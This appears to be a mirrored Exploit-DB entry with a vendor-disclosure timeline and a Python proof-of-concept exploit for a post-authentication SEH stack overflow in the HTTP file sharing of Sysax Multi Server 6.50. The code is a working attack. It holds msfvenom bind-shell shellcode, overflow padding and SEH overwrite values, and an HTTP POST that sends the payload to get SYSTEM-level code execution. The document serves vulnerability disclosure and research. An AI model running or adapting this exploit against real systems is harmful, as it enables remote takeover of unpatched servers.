Sysax Multi Server 6.50 – HTTP File Share Overflow Remote Code Execution (SEH)

  • 作者: Paul Purcell
    日期: 2016-03-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39585/
  • # Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit
    # Date: 03/21/2016
    # Exploit Author: Paul Purcell
    # Contact: ptpxploit at gmail
    # Vendor Homepage: http://www.sysax.com/
    # Vulnerable Version Download: http://download.cnet.com/Sysax-Multi-Server/3000-2160_4-76171493.html (6.50 as of posting date)
    # Version: Sysax Multi Server 6.50
    # Tested on: Windows XP SP3 English
    # Category: Remote Code Execution
    #
    # Timeline: 03/11/16 Bug found
    # 03/14/16 Vender notified
    # 03/17/16 Vender acknowledges issue and publishes patch (6.51)
    # 03/21/16 Exploit Published
    #
    # Summary:This is a post authentication exploit that requires the HTTP file sharing service to be running on
    # Sysas Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the
    # service. Once exploited, the shellcode runs with SYSTEM privileges.In this example, we attack folder_
    # in dltslctd_name1.htm.The root path of the user shouldn't break the buffer offset in the stack, though
    # the user will need to have permission to delete folders.If the user has file delete permissions, file_
    # will work as well.mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can
    # be modified to adapt to a users permissions.
    
    import httplib
    
    target = 'webbackup'
    port = 80
    sid = '57e546cb7204b60f0111523409e49bdb16692ab5'#retrieved from browser URL after login
    #example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm
    
    #msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a"
    
    shell=("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd7\xae"
    "\x73\xe9\x83\xeb\xfc\xe2\xf4\x2b\x46\xf1\xe9\xd7\xae\x13\x60"
    "\x32\x9f\xb3\x8d\x5c\xfe\x43\x62\x85\xa2\xf8\xbb\xc3\x25\x01"
    "\xc1\xd8\x19\x39\xcf\xe6\x51\xdf\xd5\xb6\xd2\x71\xc5\xf7\x6f"
    "\xbc\xe4\xd6\x69\x91\x1b\x85\xf9\xf8\xbb\xc7\x25\x39\xd5\x5c"
    "\xe2\x62\x91\x34\xe6\x72\x38\x86\x25\x2a\xc9\xd6\x7d\xf8\xa0"
    "\xcf\x4d\x49\xa0\x5c\x9a\xf8\xe8\x01\x9f\x8c\x45\x16\x61\x7e"
    "\xe8\x10\x96\x93\x9c\x21\xad\x0e\x11\xec\xd3\x57\x9c\x33\xf6"
    "\xf8\xb1\xf3\xaf\xa0\x8f\x5c\xa2\x38\x62\x8f\xb2\x72\x3a\x5c"
    "\xaa\xf8\xe8\x07\x27\x37\xcd\xf3\xf5\x28\x88\x8e\xf4\x22\x16"
    "\x37\xf1\x2c\xb3\x5c\xbc\x98\x64\x8a\xc6\x40\xdb\xd7\xae\x1b"
    "\x9e\xa4\x9c\x2c\xbd\xbf\xe2\x04\xcf\xd0\x51\xa6\x51\x47\xaf"
    "\x73\xe9\xfe\x6a\x27\xb9\xbf\x87\xf3\x82\xd7\x51\xa6\x83\xdf"
    "\xf7\x23\x0b\x2a\xee\x23\xa9\x87\xc6\x99\xe6\x08\x4e\x8c\x3c"
    "\x40\xc6\x71\xe9\xc6\xf2\xfa\x0f\xbd\xbe\x25\xbe\xbf\x6c\xa8"
    "\xde\xb0\x51\xa6\xbe\xbf\x19\x9a\xd1\x28\x51\xa6\xbe\xbf\xda"
    "\x9f\xd2\x36\x51\xa6\xbe\x40\xc6\x06\x87\x9a\xcf\x8c\x3c\xbf"
    "\xcd\x1e\x8d\xd7\x27\x90\xbe\x80\xf9\x42\x1f\xbd\xbc\x2a\xbf"
    "\x35\x53\x15\x2e\x93\x8a\x4f\xe8\xd6\x23\x37\xcd\xc7\x68\x73"
    "\xad\x83\xfe\x25\xbf\x81\xe8\x25\xa7\x81\xf8\x20\xbf\xbf\xd7"
    "\xbf\xd6\x51\x51\xa6\x60\x37\xe0\x25\xaf\x28\x9e\x1b\xe1\x50"
    "\xb3\x13\x16\x02\x15\x83\x5c\x75\xf8\x1b\x4f\x42\x13\xee\x16"
    "\x02\x92\x75\x95\xdd\x2e\x88\x09\xa2\xab\xc8\xae\xc4\xdc\x1c"
    "\x83\xd7\xfd\x8c\x3c")
    
    arg="folder_" #can also be changed to file_ if user has file delete permissions
    pid="dltslctd_name1"#Can be changed, though padding will needed to be updated as well 
    junk1="A"*26400 #Initial pile of junk
    noppad="\x90"*296 #Place to land from our long jump and before our shellcode
    junkfill="\x90"*(768-len(shell))#Fill in after our shellcode till nseh
    nseh="\xeb\x06\x90\x90" #Short jump over SEH
    seh="\xd7\x2a\x92\x5d"#pop esi # pop edi # ret RPCNS4.dll
    jump="\xe9\x13\xfc\xff\xff" #jump back 1000 bytes for plenty of room for your shellcode
    junk2="D"*9500#Junk at the end
    
    
    buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2)
    
     
    head = "Host: Wee! \r\n"
    head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n"
    head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    head += "Accept-Language: en-us,en;q=0.5\r\n"
    head += "Accept-Encoding: gzip, deflate\r\n"
    head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n"
    head += "Proxy-Connection: keep-alive\r\n"
    head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n"
    head += "Content-Length: 1337\r\n"
    head += "If-Modified-Since: *\r\n"
    head += "\r\n"
    head += "-----------------------------217830224120\r\n"
    head += "\r\n"
    head += "\r\n"
    head += "\r\n"
    head += buff
    
    conn = httplib.HTTPConnection(target,port)
    conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)